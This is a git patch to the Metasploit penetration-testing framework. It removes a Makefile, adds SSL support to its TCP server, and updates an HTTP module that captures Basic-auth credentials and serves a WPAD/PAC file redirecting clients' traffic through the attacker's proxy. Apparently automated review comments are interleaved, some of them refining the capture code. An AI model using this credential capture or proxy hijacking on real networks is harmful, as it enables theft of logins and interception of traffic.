From 1ea29ba8f015a789545e17c39256f4777afad746 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Sat, 22 Mar 2008 06:34:52 +0000 Subject: [PATCH] Fixes #218. Updates the http password capture module. Removes a bogus makefile from the tree git-svn-id: file:///home/svn/framework3/trunk@5452 4d416f70-5f16-0410-b530-b9f4589650da --- external/ruby-lorcon/Makefile | 142 ----------------------- lib/msf/core/exploit/tcp.rb | 12 +- lib/rex/socket/ssl_tcp_server.rb | 32 ++--- modules/auxiliary/server/capture/http.rb | 21 ++-- 4 files changed, 42 insertions(+), 165 deletions(-) delete mode 100644 external/ruby-lorcon/Makefile diff --git a/external/ruby-lorcon/Makefile b/external/ruby-lorcon/Makefile deleted file mode 100644 index e957faa6ec..0000000000 --- a/external/ruby-lorcon/Makefile +++ /dev/null 
@@ -1,142 +0,0 @@ - -SHELL = /bin/sh - -#### Start of system configuration section. #### - -srcdir = . -topdir = /usr/lib/ruby/1.8/i686-linux -hdrdir = $(topdir) -VPATH = $(srcdir):$(topdir):$(hdrdir) -prefix = $(DESTDIR)/usr -exec_prefix = $(DESTDIR)/usr -sitedir = $(DESTDIR)/usr/lib/ruby/site_ruby -rubylibdir = $(libdir)/ruby/$(ruby_version) -archdir = $(rubylibdir)/$(arch) -sbindir = $(exec_prefix)/sbin -datadir = $(DESTDIR)/usr/share -includedir = $(prefix)/include -infodir = $(DESTDIR)/usr/share/info -sysconfdir = $(DESTDIR)/etc -mandir = $(DESTDIR)/usr/share/man -libdir = $(DESTDIR)/usr/lib -sharedstatedir = $(prefix)/com -oldincludedir = $(DESTDIR)/usr/include -sitearchdir = $(sitelibdir)/$(sitearch) -bindir = $(exec_prefix)/bin -localstatedir = $(DESTDIR)/var/lib -sitelibdir = $(sitedir)/$(ruby_version) -libexecdir = $(exec_prefix)/libexec - -CC = i686-pc-linux-gnu-gcc -LIBRUBY = $(LIBRUBY_SO) -LIBRUBY_A = lib$(RUBY_SO_NAME)-static.a -LIBRUBYARG_SHARED = -Wl,-R -Wl,$(libdir) -L$(libdir) -L. -l$(RUBY_SO_NAME) -LIBRUBYARG_STATIC = -l$(RUBY_SO_NAME)-static - -RUBY_EXTCONF_H = -CFLAGS = -fPIC -O2 -march=pentium4 -fPIC -INCFLAGS = -I. -I. -I/usr/lib/ruby/1.8/i686-linux -I. -CPPFLAGS = -CXXFLAGS = $(CFLAGS) -DLDFLAGS = -LDSHARED = $(CC) -shared -AR = i686-pc-linux-gnu-ar -EXEEXT = - -RUBY_INSTALL_NAME = ruby18 -RUBY_SO_NAME = ruby18 -arch = i686-linux -sitearch = i686-linux -ruby_version = 1.8 -ruby = /usr/bin/ruby18 -RUBY = $(ruby) -RM = rm -f -MAKEDIRS = mkdir -p -INSTALL = /bin/install -c -INSTALL_PROG = $(INSTALL) -m 0755 -INSTALL_DATA = $(INSTALL) -m 644 -COPY = cp - -#### End of system configuration section. 
#### - -preload = - -libpath = $(libdir) -LIBPATH = -L'$(libdir)' -Wl,-R'$(libdir)' -DEFFILE = - -CLEANFILES = -DISTCLEANFILES = - -extout = -extout_prefix = -target_prefix = -LOCAL_LIBS = -LIBS = $(LIBRUBYARG_SHARED) -lorcon -ldl -lcrypt -lm -lc -SRCS = Lorcon.c -OBJS = Lorcon.o -TARGET = Lorcon -DLLIB = $(TARGET).so -EXTSTATIC = -STATIC_LIB = - -RUBYCOMMONDIR = $(sitedir)$(target_prefix) -RUBYLIBDIR = $(sitelibdir)$(target_prefix) -RUBYARCHDIR = $(sitearchdir)$(target_prefix) - -TARGET_SO = $(DLLIB) -CLEANLIBS = $(TARGET).so $(TARGET).il? $(TARGET).tds $(TARGET).map -CLEANOBJS = *.o *.a *.s[ol] *.pdb *.exp *.bak - -all: $(DLLIB) -static: $(STATIC_LIB) - -clean: - @-$(RM) $(CLEANLIBS) $(CLEANOBJS) $(CLEANFILES) - -distclean: clean - @-$(RM) Makefile $(RUBY_EXTCONF_H) conftest.* mkmf.log - @-$(RM) core ruby$(EXEEXT) *~ $(DISTCLEANFILES) - -realclean: distclean -install: install-so install-rb - -install-so: $(RUBYARCHDIR) -install-so: $(RUBYARCHDIR)/$(DLLIB) -$(RUBYARCHDIR)/$(DLLIB): $(DLLIB) - $(INSTALL_PROG) $(DLLIB) $(RUBYARCHDIR) -install-rb: pre-install-rb install-rb-default -install-rb-default: pre-install-rb-default -pre-install-rb: Makefile -pre-install-rb-default: Makefile -$(RUBYARCHDIR): - $(MAKEDIRS) $@ - -site-install: site-install-so site-install-rb -site-install-so: install-so -site-install-rb: install-rb - -.SUFFIXES: .c .m .cc .cxx .cpp .C .o - -.cc.o: - $(CXX) $(INCFLAGS) $(CPPFLAGS) $(CXXFLAGS) -c $< - -.cxx.o: - $(CXX) $(INCFLAGS) $(CPPFLAGS) $(CXXFLAGS) -c $< - -.cpp.o: - $(CXX) $(INCFLAGS) $(CPPFLAGS) $(CXXFLAGS) -c $< - -.C.o: - $(CXX) $(INCFLAGS) $(CPPFLAGS) $(CXXFLAGS) -c $< - -.c.o: - $(CC) $(INCFLAGS) $(CPPFLAGS) $(CFLAGS) -c $< - -$(DLLIB): $(OBJS) - @-$(RM) $@ - $(LDSHARED) $(DLDFLAGS) $(LIBPATH) -o $@ $(OBJS) $(LOCAL_LIBS) $(LIBS) - - - -$(OBJS): ruby.h defines.h diff --git a/lib/msf/core/exploit/tcp.rb b/lib/msf/core/exploit/tcp.rb index 606bf1faee..3373a36c58 100644 --- a/lib/msf/core/exploit/tcp.rb +++ b/lib/msf/core/exploit/tcp.rb 
@@ -251,8 +251,9 @@ module Exploit::Remote::TcpServer
 register_options(
 [
+ Opt::SSL,
 OptAddress.new('SRVHOST', [ true, "The local host to listen on.", '0.0.0.0' ]),
- OptPort.new('SRVPORT', [ true, "The local port to listen on.", 8080 ])
+ OptPort.new('SRVPORT', [ true, "The local port to listen on.", 8080 ]),
 ], Msf::Exploit::Remote::TcpServer)
 register_evasion_options(
@@ -309,6 +310,7 @@ module Exploit::Remote::TcpServer
 self.service = Rex::Socket::TcpServer.create(
 'LocalHost' => srvhost,
 'LocalPort' => srvport,
+ 'SSL' => ssl,
 'Context' => {
 'Msf' => framework,
@@ -389,6 +391,14 @@ module Exploit::Remote::TcpServer
 datastore['SRVPORT']
 end
+ #
+ # Returns the SSL option
+ #
+ def ssl
+ datastore['SSL']
+ end
+
+
 #
 # Re-generates the payload, substituting the current RHOST and RPORT with
 # the supplied client host and port from the socket.
diff --git a/lib/rex/socket/ssl_tcp_server.rb b/lib/rex/socket/ssl_tcp_server.rb
index 85a16c89d9..3264cdabac 100644
--- a/lib/rex/socket/ssl_tcp_server.rb
+++ b/lib/rex/socket/ssl_tcp_server.rb
@@ -25,19 +25,23 @@ module Rex::Socket::SslTcpServer
 def accept(opts = {})
 sock = super()
- if (sock)
- sock.extend(Rex::Socket::Tcp)
- sock.context = self.context
- pn = sock.getpeername
+ return nil if not sock
+
+ sock.extend(Rex::Socket::Tcp)
+ sock.context = self.context
+ pn = sock.getpeername
- sock.peerhost = pn[1]
- sock.peerport = pn[2]
- end
- t = OpenSSL::SSL::SSLSocket.new(sock, self.sslctx)
- t.extend(Rex::Socket::Tcp)
- t.accept
-
- t
+ begin
+ t = OpenSSL::SSL::SSLSocket.new(sock, self.sslctx)
+ t.extend(Rex::Socket::Tcp)
+ t.peerhost = pn[1]
+ t.peerport = pn[2]
+ t.accept
+ t
+ rescue ::OpenSSL::SSL::SSLError
+ sock.close
+ nil
+ end
 end
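Review bot: The new rescue in accept() only catches ::OpenSSL::SSL::SSLError, so when the handshake on `t.accept` fails with a socket-level error instead (a client that drops the connection mid-handshake can surface as a SystemCallError or EOFError rather than an SSLError), the exception propagates and the accepted `sock` is never closed. Widening it to `rescue ::OpenSSL::SSL::SSLError, ::SystemCallError, ::EOFError`, or closing `sock` from an `ensure` whenever no SSL socket is being returned, keeps the listener from leaking descriptors. `t.accept` also blocks with no deadline, so a client that connects and then sends nothing holds the accept loop until it goes away; a handshake timeout is worth considering for a listener that accepts arbitrary clients. Minor style: `return nil if not sock` reads better as `return nil unless sock`, and `sock.context` is copied while `t.context` is not, which looks like an oversight since callers receive `t`.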
@@ -65,8 +69,8 @@ module Rex::Socket::SslTcpServer
 cert.subject = subject
 cert.issuer = issuer
- cert.not_before = Time.now
- cert.not_after = Time.now + 3600
+ cert.not_before = Time.now - 7200
+ cert.not_after = Time.now + 7200
 cert.public_key = key.public_key
 ef = OpenSSL::X509::ExtensionFactory.new(nil,cert)
 cert.extensions = [
diff --git a/modules/auxiliary/server/capture/http.rb b/modules/auxiliary/server/capture/http.rb
index 0629810586..051db897bd 100644
--- a/modules/auxiliary/server/capture/http.rb
+++ b/modules/auxiliary/server/capture/http.rb
@@ -53,6 +53,8 @@ class Auxiliary::Server::Capture::HTTP < Msf::Auxiliary
 end
 def run
+ @myhost = datastore['SRVHOST']
+ @myport = datastore['SRVPORT']
 exploit()
 end
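Review bot: `cert.not_after = Time.now + 7200` fixes the self-signed certificate's lifetime at two hours from generation, so a listener left running longer than that presents an expired certificate and TLS clients that check validity will refuse to complete the handshake; if the 7200 shift is meant as clock-skew tolerance, the backdated `not_before` already provides that and `not_after` should be much further out, or the certificate should be regenerated when it lapses. The literal 7200 appears twice with no explanation; a comment above the pair such as `# two hours of slack so clients with skewed clocks accept the cert` would make the intent clear, and a named constant would keep the two in step. The enclosing method starts and ends outside the hunk.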
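Review bot: `@myhost = datastore['SRVHOST']` caches the listen address, but SRVHOST defaults to '0.0.0.0' (see the tcp.rb hunk above), so any fallback built from `@myhost` when a request carries no Host header yields the wildcard address rather than something a client could reach; `Rex::Socket.source_address(cli.peerhost)`, which dispatch_request already computes for the PAC response, is the usable value. Independently, the tcp.rb mixin already exposes `srvhost`/`srvport` accessors over the same datastore keys (`'LocalHost' => srvhost`, `'LocalPort' => srvport` in the hunk above), so the two instance variables duplicate existing accessors; preferring those keeps a single source of truth.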
@@ -91,27 +93,30 @@ class Auxiliary::Server::Capture::HTTP < Msf::Auxiliary
 end
 def dispatch_request(cli, req)
-
+
+ mysrc = Rex::Socket.source_address(cli.peerhost)
+ hhead = (req['Host'] || @myhost).split(':', 2)[0]
+
 if(req['Authorization'] and req['Authorization'] =~ /basic/i)
 basic,auth = req['Authorization'].split(/\s+/)
 user,pass = Rex::Text.decode_base64(auth).split(':', 2)
 report_auth_info(
 :host => cli.peerhost,
 :proto => 'http',
- :targ_host => req['Host'] || datastore['SRVHOST'],
- :targ_port => datastore['SRVPORT'],
+ :targ_host => hhead,
+ :targ_port => @myport,
 :user => user,
 :pass => pass,
 :extra => req.resource.to_s
 )
- print_status("HTTP LOGIN #{req['Host']}:#{datastore['SRVPORT']} #{user} / #{pass} => #{req.resource}")
+ print_status("HTTP LOGIN #{cli.peerhost} > #{hhead}:#{@myport} #{user} / #{pass} => #{req.resource}")
 end
 if(req.resource =~ /^wpad.dat|.*\.pac$/i)
- prx = "function FindProxyForURL(url, host) { return 'PROXY #{Rex::Socket.source_address(cli.peerhost)}:#{datastore['SRVPORT']}'; }"
+ prx = "function FindProxyForURL(url, host) { return 'PROXY #{mysrc}:#{@myport}'; }"
 res = "HTTP/1.1 200 OK\r\n" +
- "Host: #{req['Host'] || datastore['SRVHOST']}\r\n" +
+ "Host: #{hhead}\r\n" +
 "Content-Type: application/x-ns-proxy-autoconfig\r\n" +
 "Content-Length: #{prx.length}\r\n" +
 "Connection: Close\r\n\r\n#{prx}"
@@ -120,9 +125,9 @@ class Auxiliary::Server::Capture::HTTP < Msf::Auxiliary
 return
 end
- print_status("HTTP REQUEST #{req['Host']}:#{datastore['SRVPORT']} #{req.resource}")
+ print_status("HTTP REQUEST #{cli.peerhost} > #{hhead}:#{@myport} #{req.method} #{req.resource}")
- data = "Connecting..."
+ data = "Connecting..."
 res = "HTTP/1.1 200 OK\r\n" +
 "Host: #{req['Host'] || datastore['SRVHOST']}\r\n" +
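Review bot: `hhead = (req['Host'] || @myhost).split(':', 2)[0]` keeps only the text before the first colon, so a bracketed IPv6 Host value (constructed example: `[::1]:8080`) is recorded as `[`; stripping a trailing port instead, `hhead = (req['Host'] || @myhost).sub(/:\d+\z/, '')`, handles both forms. The value is client-controlled and is now echoed into the response `Host:` line and stored as `:targ_host`, so a comment such as `# Host is whatever the client sent; targ_host is not authoritative` would help whoever later reads the captured records. In the unchanged lines below, `req['Authorization'] =~ /basic/i` matches the word anywhere in the header, and a bare `Authorization: Basic` with no token leaves `auth` nil before `Rex::Text.decode_base64(auth)`, which presumably raises; `/\Abasic\s+/i` plus a guard on `auth` would make the capture path robust to malformed clients.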
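Review bot: The new `print_status` line switches to `hhead` and `@myport`, but the response built on the two lines below still uses `"Host: #{req['Host'] || datastore['SRVHOST']}\r\n"`, the exact expression the previous hunk replaced with `"Host: #{hhead}\r\n"` for the PAC response; changing this one the same way keeps the two paths consistent and stops echoing an unstripped `host:port` value. `#{req.method}` is new in the log line; whether the request object exposes `method` as the HTTP verb is not visible here and is worth confirming, since otherwise `Object#method` is called with no arguments and raises ArgumentError on every request. The enclosing dispatch_request method ends outside the hunk.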